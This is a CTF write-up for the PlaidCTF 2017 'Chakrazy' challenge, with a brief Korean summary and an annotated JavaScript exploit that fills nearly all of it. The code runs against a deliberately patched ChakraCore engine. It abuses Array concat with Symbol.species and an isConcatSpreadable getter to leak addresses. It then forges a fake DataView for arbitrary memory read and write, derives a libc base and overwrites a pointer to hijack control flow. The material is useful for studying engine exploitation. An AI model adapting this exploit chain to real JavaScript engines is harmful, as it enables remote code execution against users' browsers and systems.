PCTF 2017 Chakrazy — Pwnable/CTF — 2018. 12. 25. 00:14
Array.prototype.concat 도중 실행되는 Symbol.isConcatSpreadable getter로, Symbol.species가 만들어 준 결과 배열을 덮어써서 주소를 leak하고, leak한 주소로 fake DataView를 만들어 익스하면 된다. (아래 오프셋 상수들은 문제에서 준 패치된 ChakraCore 빌드/libc 전용이다.)
// PCTF 2017 "Chakrazy" exploit (patched ChakraCore pwnable).
//
// What the code below does, in order:
//   1. leak()/leak2() abuse Array.prototype.concat: `a.constructor[Symbol.species]`
//      hands concat a result array `p` that this code keeps a reference to, and a
//      Symbol.isConcatSpreadable getter on `b` fires *during* the concat and writes
//      into `p` mid-operation. The first two elements of the returned array are then
//      read as the low/high 32-bit halves of a pointer (see the hex formatting below).
//   2. The leaked values are written into a plain int array `dv` laid out as a fake
//      DataView object (the writeup's "FakeDataview").
//   3. The same concat trick is run once more to obtain `temp`, which the patched
//      engine presumably accepts as that fake DataView; DataView.prototype
//      getUint32/setUint32 are then .call()'d on it for arbitrary read/write.
//   4. A pointer is overwritten and `dv.hasOwnProperty('AAAA')` is evaluated,
//      presumably to dispatch through the overwritten pointer.
//
// NOTE(review): this works only against the deliberately patched engine shipped
// with the challenge. On a correct engine ArraySpeciesCreate/concat are not
// confusable this way, `getUint32.call(temp, ...)` throws a TypeError because
// `temp` has no [[DataView]] internal slot, and every hard-coded constant
// (574280, 0x84548, 0x90518, 0xd5db40, 0x1628000, 0xf1147 and the
// 0x10/0x30/0x38/0xa0 field values) is specific to that build and its libc.
// None of it is reusable without re-deriving the offsets for the target.
//
// Implicit global: `p` is never declared. Every Symbol.species callback assigns
// it and every isConcatSpreadable getter reads it — they communicate through it.
// `te` looks like an implicit global at its first use but is in fact the hoisted
// `var te` declared further down; `c`/`b` are redeclared at script level below.

// Fills `arr` (an int array) with a fake-object layout: 64-bit values are split into
// (lo, hi) 32-bit pairs at consecutive even/odd indices.
// NOTE(review): defined but never called in this script; the layout that is actually
// used is written inline below and places the ArrayBuffer pointer at [10..11], not
// [12..13] as labelled here. Kept for reference only.
function set_dv(arr,lo,hi) {
    arr[0] = 56
    arr[4] = (lo - 574280) //+0x3c000   build-specific offset from the leaked address
    arr[5] = hi
    arr[10] = lo
    arr[11] = hi
    arr[12] = lo //ArrayBuffer
    arr[13] = hi
    arr[14] = lo //buffer
    arr[15] = hi
}

// Leak primitive. `addr` is the object whose address we want.
// concat() looks up a.constructor[Symbol.species] and uses the returned `p` as its
// result array; while concat is still running it reads b[Symbol.isConcatSpreadable],
// which is a getter that stores `addr` into p[0] and b[0]. In the patched engine this
// mid-concat write is what turns the object reference into raw integers in the
// returned array (the caller reads elements 0 and 1 as the low/high pointer halves).
function leak(addr) {
    var a = [1,2,3,4];
    var b = [5,6,7,8];
    var c = new Function(); // empty constructor, used only as a carrier for Symbol.species
    c[Symbol.species] = function() {
        p = [9,10,11,12]; // implicit global; also read by the getter below
        return p;
    };
    a.constructor = c;
    b.__defineGetter__(Symbol.isConcatSpreadable,function() {
        p[0] = addr; // written into concat's own result array while concat runs
        b[0] = addr;
        return true;
    });
    return a.concat(b);
}

// Byte-for-byte copy of leak(); kept as a separate function, presumably so that the
// two leaks do not share one function object/JIT state. Same contract as leak().
function leak2(addr) {
    var a = [1,2,3,4];
    var b = [5,6,7,8];
    var c = new Function();
    c[Symbol.species] = function() {
        p = [9,10,11,12];
        return p;
    };
    a.constructor = c;
    b.__defineGetter__(Symbol.isConcatSpreadable,function() {
        p[0] = addr;
        b[0] = addr;
        return true;
    });
    return a.concat(b);
}

// --- step 1: leak the address of a real ArrayBuffer and a real DataView's methods ---
var result = new Uint32Array(2);
var ab_one = new ArrayBuffer(8);
var dv_one = new DataView(ab_one); // only its getUint32/setUint32 are used, via .call()
var ab_temp = leak2(ab_one);       // [lo, hi] halves of ab_one's address
result[0] = ab_temp[0];
result[1] = ab_temp[1];
// hi then lo as hex. Cosmetic only: the low half is not zero-padded, so the printed
// value is wrong whenever result[0] < 0x10000000.
te = '0x'+(result[1].toString(16)) + (result[0]).toString(16)
console.log(te);

// --- step 2: build the fake DataView inside an int array ---
var dv = [0];
for(var i=0;i<16;i++)
    dv[i] = 0x0;
var dv_temp = leak(dv); // [lo, hi] halves of dv's address
// Build-specific adjustment of the leaked low half (the alternative `- 0x90518` is
// presumably for another build). Whatever this points at, it is undone again
// at dv[14] and in the final setUint32 below.
dv_temp[0] = dv_temp[0] - 0x84548+0x30; //- 0x90518
result[0] = dv_temp[0];
result[1] = dv_temp[1];
var te = '0x'+(result[1].toString(16)) + (result[0]).toString(16)
console.log(te);
// Fake object fields, as (lo, hi) pairs. The meaning of each slot is not recoverable
// from this file alone; the labels below are the writeup's, hedged.
dv[0] = 0;
dv[2] = dv_temp[0]+0x10;   // pointer: adjusted address + 0x10
dv[3] = dv_temp[1];
dv[4] = 0x38;
dv[6] = dv_temp[0];        // pointer: adjusted address
dv[7] = dv_temp[1];
dv[8] = 0x30;
dv[10] = ab_temp[0];       // pointer: the real ArrayBuffer ab_one (set_dv labels this "ArrayBuffer")
dv[11] = ab_temp[1];
dv[14] = (dv_temp[0]+0x84548-0x30); // pointer: the original, unadjusted address of dv
dv[15] = dv_temp[1];

// --- step 3: get a reference that the engine treats as the fake DataView ---
var a_attack = [];
for(var i=0;i<0x10;i++)
    a_attack[i] = i;
var b = [dv_temp[0],dv_temp[1]]; // the adjusted dv address as two ints
var c = new Function();
c[Symbol.species] = function() {
    p = [9,10,11,12];
    return p;
};
a_attack.constructor = c;
b.__defineGetter__(Symbol.isConcatSpreadable,function() {
    p[0] = {}; // this time an object is stored, not an address: the inverse of leak()
    return true;
});
// Element 8 of the confused result; presumably the two ints of `b` have been
// reinterpreted as an object pointer, i.e. the fake DataView built in `dv`.
var temp = (a_attack.concat(b))[8];

// --- step 4: arbitrary read/write through the fake DataView, then trigger ---
var clib = [0,0];
// Read 8 bytes (little-endian, as two uint32) at offset 0 of the fake view's buffer
// and subtract a build-specific constant; the comment below says adding 0x1628000
// yields the libc base.
clib[0] = dv_one.getUint32.call(temp,0,true) - 0xd5db40;
clib[1] = dv_one.getUint32.call(temp,4,true);
//libc = clib[0] + 0x1628000
var te = '0x'+(clib[1].toString(16)) + (clib[0]).toString(16)
console.log(te);
// Write libc_base + 0xf1147 (a libc-relative target for the challenge's libc —
// presumably a call target; confirm against that libc) at offset 16/20.
dv_one.setUint32.call(temp,16,clib[0]+0x1628000+0xf1147,true);
dv_one.setUint32.call(temp,20,clib[1],true);
// Redirect the pointer at offset 0 to (original dv address + 16 - 0xa0), i.e. so that
// the value just written at +16 sits at the expected offset from the new pointer.
dv_one.setUint32.call(temp,0,dv_temp[0]+0x84548-0x30+16-0xa0,true);
// Trigger: a property lookup on dv, presumably dispatching through the pointer above.
dv.hasOwnProperty('AAAA');